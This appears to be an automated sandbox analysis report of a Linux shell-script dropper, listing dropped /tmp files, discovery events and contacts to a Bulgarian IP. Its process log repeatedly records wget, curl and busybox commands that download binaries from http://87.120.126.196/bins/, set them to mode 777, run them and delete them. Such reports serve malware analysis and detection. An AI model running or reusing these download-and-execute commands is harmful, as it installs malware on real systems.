N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A

Processes

/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh

[/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
